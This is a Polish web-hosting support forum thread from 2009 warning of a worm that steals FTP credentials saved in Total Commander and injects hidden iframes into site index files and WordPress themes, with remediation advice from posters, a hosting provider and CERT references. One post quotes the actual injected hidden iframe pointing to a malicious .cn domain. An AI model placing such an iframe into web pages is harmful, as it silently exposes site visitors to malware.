phpBB2 by Przemo
Support forów phpBB2 modified by Przemo

FAQFAQ - PIERWSZA POMOC!!  regulaminREGULAMIN  SzukajSZUKAJ  UżytkownicyUżytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj  DownloadDownload  katalog Forów DyskusyjnychKatalog Forów   FAQ Video tutoriale

Poprzedni temat «» Następny temat
[Problem] UWAGA ROBAK!
Autor Wiadomość
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 15-04-2009, 19:08   [Problem] UWAGA ROBAK!

UWAGA! Po sieci grasuje robak, który łączy się z serwerami FTP i infekuje strony internetowe.

Cytat:

Szkodnik kradnie hasła z programu Total Commander po czym dodaje ukryte ramki, linki i złośliwy kod do plików index.php, index.html, main.php i wielu innych, które ma w definicjach.
Zagrożone są strony oparte na autorskich oraz popularnych skryptach, np. Wordpress. Użytkownicy tego ostatniego narzędzia mogą znaleźć złośliwy kod w szablonach w katalogu wp-content/themes/ oraz w innych plikach z ustawieniami konfiguracyjnym - ostrzega autor shpyo.net.
Po zainfekowaniu strony dostęp do niej zostaje zablokowany przez osłony sieciowe programów antywirusowych, a także przez wyszukiwarkę Google, która ostrzega o niebezpiecznej stronie.
Aby wyjaśnić sytuację i rozwiać ewentualne wątpliwości Dziennik Internautów skontaktował się z polskim przedstawicielem Total Commandera. Potwierdził on pojawienie się wyjątkowo aktywnego szkodnika, który faktycznie loguje się się na konta FTP i dodaje pewien fragment kodu do plików startowych.

- Jedynym bezpiecznym rozwiązaniem problemu jest usunięcie wirusa poprzez program antywirusowy a następnie zmiana haseł do swoich kont FTP. Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES. Do czasu wydania finalnej nowej wersji zalecam niezapisywanie haseł w programie - radzi przedstawiciel programu Total Commander.

Źródło: http://di.com.pl/news/263..._przez_FTP.html
Mieliśmy ostatnio zgłoszenia, w których do plików dopisywano IFRAME z linkiem typu www.googleads.biz

Cytat:
Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php

Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):



Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.

Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>

Robert napisał/a:
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.>


Proszę uważać - zaktualizować swoje programy antywirusowe i nie przechowywać haseł w Total Commanderze - nie korzystać z opcji zapamiętania hasła!

Szczegółowe informacje o sposobie działania szkodnika znajdziecie na stronie http://www.cert.pl/news/1571

_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
Ostatnio zmieniony przez arcy 24-05-2009, 17:03, w całości zmieniany 5 razy  
 
     
Gadatliwa Kasia 

   
fastlone

Pomógł: 2 razy
Posty: 136
Wysłany: 15-04-2009, 19:25   

A dotyczy to File Zilli albo innych programów od FTP?
Czy tylko Total Commander?
_________________
Zakaz Pisania v 2.0
 
     
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 15-04-2009, 19:27   

TC - robak najprawdopodobniej pobiera dane do logowania z pliku konfiguracyjnego Total Commandera.
_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
Ostatnio zmieniony przez arcy 16-04-2009, 20:57, w całości zmieniany 1 raz  
 
     
They2


Pomógł: 82 razy
Posty: 1297
Wysłany: 15-04-2009, 20:18   

fakt

naprawde lubie taki popularny program TC, dawny WC. :?
_________________
Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG.
 
     
nieoznakowane


Pomógł: 7 razy
Posty: 101
Wysłany: 15-04-2009, 20:19   

Polecam LINUX-a ;)
 
     
They2


Pomógł: 82 razy
Posty: 1297
Wysłany: 15-04-2009, 20:20   

arcy napisał/a:
TC - wirus najprawdopodobniej pobiera dane do logowania z pliku konfiguracyjnego Total Commandera.
z 2 plików ktore wiem gdzie to jest,
to w katalogu C:\WINDOWS w rozszerzeniu ini.
_________________
Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG.
 
     
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 15-04-2009, 20:33   

nieoznakowane napisał/a:
Polecam LINUX-a ;)
Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy. Czasy romantycznych hakerów się skończyły - teraz wirusy i trojany to biznes i pieniądze. A na niszowym systemie wiele nie zarobią. Tym bardziej, że ludzie używający Linuxa są zwykle bardziej świadomi kwesti bezpieczeństwa.

arcy napisał/a:
Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES.
_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
 
     
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 15-04-2009, 20:46   

Cytat:
Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php

Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
Kod:
<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>


Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.

Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>

Robert napisał/a:
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.>
_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
 
     
Seba123


Pomógł: 74 razy
Posty: 868
Wysłany: 15-04-2009, 21:03   

Filezilla również.
_________________
Fejs
 
     
Paszczak000


Pomógł: 317 razy
Posty: 2898
Wysłany: 16-04-2009, 07:33   

arcy napisał/a:
Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy.

Jest bardziej popularny w rozwiązaniach serwerowych (a właśnie takie maszyny opłaca się atakować) i jakoś dalej się trzyma :] Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :]
 
     
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 16-04-2009, 20:27   

Paszczak000 napisał/a:
Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :]
Raczej mało prawdopodobne, przynajmniej za tego życia :) Jak Bóg da to się zreinkarnuję w postaci Linuksowego serwera :) Cóż, nie będę polemizował ze specjalistą, bo moja wiedza na te tematy jest o taka malutka :) Powiem tylko, że mnie Windows pasuje i mimo wielokrotnych prób i przymiarek do RedHata, Mandrivy i Ubuntu, mój XP nadal pozostaje dla mnie najwygodniejszy w codziennym użyciu. Mimo wirusów, trojanów i innego dziadostwa :)
_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
 
     
inwob

Posty: 49
Wysłany: 17-04-2009, 16:05   

Chyba mojemu koledze to się przyczepiło bo strona zmienila układ ;d
Obniżyła się i cały układ się zepsół:)
 
     
They2


Pomógł: 82 razy
Posty: 1297
Wysłany: 17-04-2009, 20:43   

Już jest dostępna wersja programu TC 7.50 Beta 1
http://www.ghisler.com/750beta.htm

na razie jest to wersja testowa.
_________________
Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG.
 
     
arcy



Pomógł: 509 razy
Posty: 3761
Wysłany: 17-04-2009, 21:37   

Bardzo ciekawy post na temat robaka na forum jednego z dostawców usług hostingowych + sporo innych linków -

http://forum.netlook.pl/index.php/topic,308.0.html
Cytat:
Niestety, codziennie informujemy o takim zagrożeniu przynajmniej 10-20 klientów, którzy używając nieświadomie TC narazili się na ataki w postaci modyfikacji stron WWW i dodania do nich ramek wbudowanych iframe lub skryptów javascript wywołujących zdalnie wirusa.

Mamy 100% pewność co do infekcji która przeprwadzana jest z winy programu Total Commander /  Windows Commander, ale także podejrzenia infekcji w przypadku korzystania z innych programów FTP, jeżeli na komputerze ofiary jest zainstalowany wspomniany wirus / koń trojański. Wówczas hasło nawet niezapisane w programie FTP, podczas połączenia, jest przechwytywane i przesyłane do hakerów.

Rozwiązniem problemu jest:

1. korzystanie tylko z aktualnych, bezpiecznych programów FTP typu Filezilla lub CuteFTP
2. systematyczne (codzienne) skanowanie komputera programami antywirusowymi
3. niezapisywanie haseł w programach FTP lub innych niezabezpieczonych formach na komputerze
4. korzystanie z różnych haseł dostępu do różnych usług / serwerów
5. bezpieczeństwo sieci internetowej z której korzyta użytkownik (dotyczy szczególnie sieci lokalnych, w których z jednego łącza korzysta wiele komputerów - wówczas na łączu może być zainstalowany koń trojański do nasłuch haseł)

Nasze serwery mają zaimplementowane różnego rodzaju systemy wczesnego ostrzegania przed takimi atakami. Ataki dzielą się na kilka form, oto one:

1. ataki przewidywane, w których komputer zombie atakująy serwer FTP ofiary najpierw sprawdza czy serwer działa wgrywając specjalnie spreparowany plik testowy, a następnie od razu go usuwając - taki atak jest wykrywalny, w 80% można go wyeliminować
2. atak przewidywalny, w którym komputer zombie atakuje serwer FTP w celu zainstalowania na nim skryptu do wysyłania mass-mailingów spamowych bez wiedzy i zgody użytkownika - taki atak jest wykrywalny, w 70% można go wyeliminować
3. tzw. atak cichy - komputer zombie atakujący serwer FTP ofiary łączy się jednorazowo z tym serwerem, od razu w sposób autoryzowany, bez żadnych błędów, przy użyciu hasła wcześniej wykradzionego, pobiera a następnie praktycznie w tej samej chwili nadpisuje pliki indexowe lub inne pliki kodu strony - taki atak wykrywalny jest przez system zabezpieczeń dopiero po fakcie wystąpienia, w momencie skanowania już wgranych plików pod kątem obecności złośliwego kodu. Tego ataku nie można wyeliminować, a po wykryciu jedyne co może zrobić użytkownik to poprawić zmodyfikowane pliki aby nie zawierały złośliwego kodu

We wszystkich przypadkach obserwuje się całkowite zaprzestanie ataków na stronę WWW i FTP klienta po tym kiedy zostanie zmienione hasło dostępu do FTP.>
_________________
| Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser
|
Ostatnio zmieniony przez arcy 17-04-2009, 21:55, w całości zmieniany 1 raz  
 
     
Gadatliwa Kasia 

   
_mateusz2
zbanowany

Posty: 88
Wysłany: 18-04-2009, 07:48   

forum mojego kolegi to zatakowało ma to może być to :?: HEUR:Trojan.Script.Iframer
 
     
Wyświetl posty z ostatnich:   
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
Dodaj temat do Ulubionych
Wersja do druku

Skocz do:  

Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!

Powered by phpBB modified by Przemo © 2003 phpBB
Strona wygenerowana w 0,12 sekundy. Zapytań do SQL: 11
Polecane serwisy

Najlepsze oprogramowanie do prowadzenia sklepu internetowegoNajlepszy program do sklepu firmowany przez Przem'a

Sklep z gadżetami

Design Cart - Tworzenie sklepu internetowego

iRonin.IT

• Zamów reklamę